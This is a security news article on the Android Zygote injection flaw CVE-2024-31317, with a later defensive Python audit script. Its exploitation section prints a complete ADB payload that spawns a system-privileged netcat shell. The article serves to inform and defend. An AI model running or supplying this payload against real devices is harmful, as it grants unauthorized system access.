Android Zygote Injection Vulnerability Let Attackers Execute Code & Escalate Privileges

A critical Android vulnerability identified as CVE-2024-31317 has been discovered that allows attackers to execute arbitrary code with system privileges.

The “Zygote Injection” vulnerability affects devices running Android 11 or older and enables attackers to escalate privileges from a shell user to the system user, potentially compromising entire devices.

The vulnerability has been described by security researchers as possibly the most valuable userspace Android vulnerability in recent years.


The vulnerability targets Android’s Zygote process, a crucial component in the operating system responsible for forking new applications and system processes.

When an Android device powers on, after the Linux kernel initializes, it launches essential Android services including the Zygote process, which runs with system privileges.

This makes Zygote an attractive target for attackers seeking elevated access to Android devices.

Security researchers at Infosec found that Android’s hidden_api_blacklist_exemptions global setting, which allows certain apps to bypass Android’s hidden API restrictions, can be manipulated to inject malicious commands.

The System Server component does not properly escape newline characters when passing commands to the Zygote process, creating a critical injection point.

This occurs because System Server’s update() method is called whenever the hidden_api_blacklist_exemptions setting changes, and it passes this setting directly to Zygote without proper sanitization.

Exploitation requires the WRITE_SECURE_SETTINGS permission, which is available to ADB shell and certain pre-installed system apps.

PoC demonstrating Zygote Injection exploitation via ADB (Source – Medium)

While unprivileged apps cannot alter this setting, security researchers demonstrated that when a malicious actor modifies the hidden_api_blacklist_exemptions setting with injected newlines, they can append arbitrary Zygote commands that the system treats as legitimate commands for process creation.

Technical Exploitation

The vulnerability can be exploited through a sequence of ADB commands on a device with USB debugging enabled.

First, the attacker stops the settings app and injects a payload into the hidden_api_blacklist_exemptions setting by executing these commands:

am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread "
am start -a android.settings.SETTINGS

Android boot process, showing how the Zygote process is launched (Source – Medium)

This payload creates a persistent netcat listener on port 1234 that provides shell access with system privileges.

The exploit works by injecting a specially crafted command whose critical element is the --invoke-with parameter, which executes netcat before the process itself runs, binding a shell to localhost on port 1234.

After execution, connecting with “nc localhost 1234” provides a system-level shell, allowing the attacker to run commands with elevated privileges.

Users should be cautious as exploiting this vulnerability can cause device bootloops because the modified setting persists across reboots and directly affects how Zygote spawns processes.

If this occurs, users may still access the device via ADB and repair it by deleting the modified setting with “settings delete global hidden_api_blacklist_exemptions” followed by a reboot.
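The mechanism described above (a newline in hidden_api_blacklist_exemptions becomes extra lines in the Zygote command stream) and the recovery step can both be checked offline. The following Python audit is an added example, not code from the article or from AOSP: audit_exemptions() takes the raw value as returned by “settings get global hidden_api_blacklist_exemptions” and flags control characters, Zygote-style argument lines and entries that are not member signatures, while sanitize_for_zygote() shows the defensive pattern of refusing to forward any entry containing a line break (my rendering of the check, not the actual patch). The signature regex and sample values are assumptions.

```python
import re
from dataclasses import dataclass, field

# One legitimate exemption entry is a JVM-style member signature, e.g.
# "Landroid/os/Build;->getStuff(I)V" or "Lcom/example/Foo;->BAR:I".
# (Regex is an approximation written for this example.)
SIGNATURE_RE = re.compile(r"^L[\w/$]+;->[\w$<>]+(\([^)]*\)\S*|:\S+)?$")

@dataclass
class AuditResult:
    ok: bool
    findings: list = field(default_factory=list)

def audit_exemptions(raw: str) -> AuditResult:
    """Audit the raw hidden_api_blacklist_exemptions value.

    The unpatched System Server forwarded this value into the Zygote
    command stream, where every line is one argument, so any newline in
    it means the Zygote would see extra, attacker-chosen arguments."""
    findings = []
    if raw is None or raw.strip() in ("", "null"):
        return AuditResult(True, [])   # setting unset: nothing to forward
    # Newline is the injection primitive; \r and NUL are reported too.
    bad = sorted({c for c in raw if c in "\r\n\0"})
    if bad:
        findings.append("control characters present: " + ", ".join(repr(c) for c in bad))
    # Everything after the first line is what Zygote would parse as further
    # arguments; report lines shaped like an argument count or a --flag.
    for line in raw.split("\n")[1:]:
        s = line.strip()
        if s.startswith("--") or s.isdigit():
            findings.append("Zygote-style argument in value: " + s)
    # Each comma-separated entry must look like a member signature.
    for entry in raw.replace("\n", "").split(","):
        e = entry.strip()
        if e and not SIGNATURE_RE.match(e):
            findings.append("entry is not a member signature: " + e)
    return AuditResult(not findings, findings)

def sanitize_for_zygote(entries):
    """Defensive pattern (assumed, not the AOSP code): reject any entry
    with a line break instead of splicing it into the command stream."""
    for e in entries:
        if "\n" in e or "\r" in e:
            raise ValueError("exemption contains a line break; refusing: %r" % e)
    return ",".join(entries)

if __name__ == "__main__":
    # Constructed sample: benign list, then a value with an injected line.
    print(audit_exemptions("Landroid/os/Build;->getStuff(I)V"))
    print(audit_exemptions("LClass1;->m(\n1\n--setuid=1000\nx"))
```

On a real device the value to audit is the output of “adb shell settings get global hidden_api_blacklist_exemptions”; a non-empty findings list is a reason to delete the setting and reboot, as described above.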

Android devices should be updated to the latest security patches to mitigate this serious vulnerability, especially since it affects all Android versions up to Android 11.

The Android Zygote Injection vulnerability demonstrates how seemingly minor input validation issues can lead to system-wide security compromises.

While this vulnerability primarily affects older Android versions, it highlights the importance of proper security boundaries in operating system design.

Users are advised to keep their devices updated and be cautious about enabling USB debugging except when absolutely necessary for development purposes.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.